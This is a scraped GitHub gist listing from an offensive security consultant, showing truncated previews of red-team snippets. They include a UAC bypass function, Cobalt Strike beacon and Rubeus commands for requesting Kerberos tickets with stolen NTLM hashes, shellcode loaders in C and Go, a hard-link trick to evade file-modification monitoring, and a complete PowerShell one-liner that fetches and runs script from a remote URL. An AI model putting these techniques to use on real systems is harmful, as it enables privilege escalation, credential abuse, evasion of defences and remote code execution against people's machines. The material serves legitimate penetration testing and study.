Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Offensive Sencha Consultant

Mariusz B. mgeeky

💭
Offensive Sencha Consultant
View GitHub Profile
@mgeeky
mgeeky / bh_split2.py
Created May 25, 2021 — forked from Acebond/bh_split2.py
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations.
View bh_split2.py
#!/usr/bin/python3
# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
# pip install simplejson
import simplejson
import sys
def splitfile(file_name, object_limit):
print(f"[*] Loading {file_name}")
with open(file_name) as f:
data = simplejson.load(f)
@mgeeky
mgeeky / uac-silentcleanupbypass.ps1
Created May 12, 2021
UAC Bypass: SilentCleanup (Win10 1903+). Leaves powershell.exe running with nasty command line: (powershell -w hidden -c "& 'C:\your\evil\command.exe'";#\system32\werfault.exe)
View uac-silentcleanupbypass.ps1
function UAC-SilentCleanupBypass {
param(
[Parameter(Mandatory = $True)]
[String]$Command
)
$assemblies=(
"System"
)
View gist:ec8fabcf28678eb99646a10d3752884f
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
View gist:6adb2c09abcef8d86b2eb0adfcab5692
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@mgeeky
mgeeky / Get-AntiVirusProduct.ps1
Created Jan 14, 2021
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
View Get-AntiVirusProduct.ps1
function Get-AntiVirusProduct {
[CmdletBinding()]
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
[Alias('name')]
$computername=$env:computername
)
@mgeeky
mgeeky / hexdump.py
Created Jan 3, 2021
Hexdump implementation in Python
View hexdump.py
def hexdump(data, addr = 0, num = 0):
s = ''
n = 0
lines = []
if num == 0: num = len(data)
if len(data) == 0:
return '<empty>'
for i in range(0, num, 16):
@mgeeky
mgeeky / shellcodeLoader.c
Last active Jan 26, 2021
Simplest windows shellcode loader there can be, purely in C
View shellcodeLoader.c
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: ./shellcodeLoader <shellcode64>\n");
return 1;
}
@mgeeky
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
View shellcodeLoader.go
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@mgeeky
mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
View PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]